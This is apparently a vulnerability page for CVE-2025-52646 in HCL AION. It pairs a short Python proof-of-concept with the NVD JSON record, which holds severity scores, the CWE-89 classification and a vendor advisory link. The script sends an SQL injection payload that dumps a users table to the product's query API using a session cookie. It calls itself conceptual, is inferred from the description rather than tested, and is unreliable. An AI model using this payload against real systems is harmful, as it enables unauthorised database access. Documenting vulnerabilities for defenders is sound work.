CVE-2025-52646

// CVE-2025-52646 PoC - HCL AION SQL Query Execution // Note: This is a conceptual PoC based on the vulnerability description // Actual exploitation requires local access and user interaction import requests import json # Configuration target_url = "https://[AION_HOST]/api/query" session_cookie = "[USER_SESSION_COOKIE]" # Malicious SQL query payload sql_payload = "'; SELECT * FROM users; --" # Construct the request headers = { "Cookie": f"JSESSIONID={session_cookie}", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } payload = { "query": sql_payload, "config_id": "vulnerable_config", "execute": True } # Send the request (requires user interaction to trigger) try: response = requests.post(target_url, headers=headers, json=payload, timeout=30) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") // Recommended verification steps: // 1. Check if SQL query execution is restricted to admin-only // 2. Verify input sanitization on all query parameters // 3. Review product configuration settings for security controls

{"cve": {"id": "CVE-2025-52646", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:18.837", "lastModified": "2026-04-28T21:42:13.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries. Improper validation or restrictions on query execution could expose the system to unintended database interactions or limited information exposure under specific conditions."}, {"lang": "es", "value": "HCL AION está afectado por una vulnerabilidad donde ciertas configuraciones de la oferta pueden permitir la ejecución de consultas SQL potencialmente dañinas. La validación o las restricciones inadecuadas en la ejecución de consultas podrían exponer el sistema a interacciones no intencionadas con la base de datos o a una exposición limitada de información bajo condiciones específicas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "1AD0DD06-7840-4FFE-8BCF-1B94410B237D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}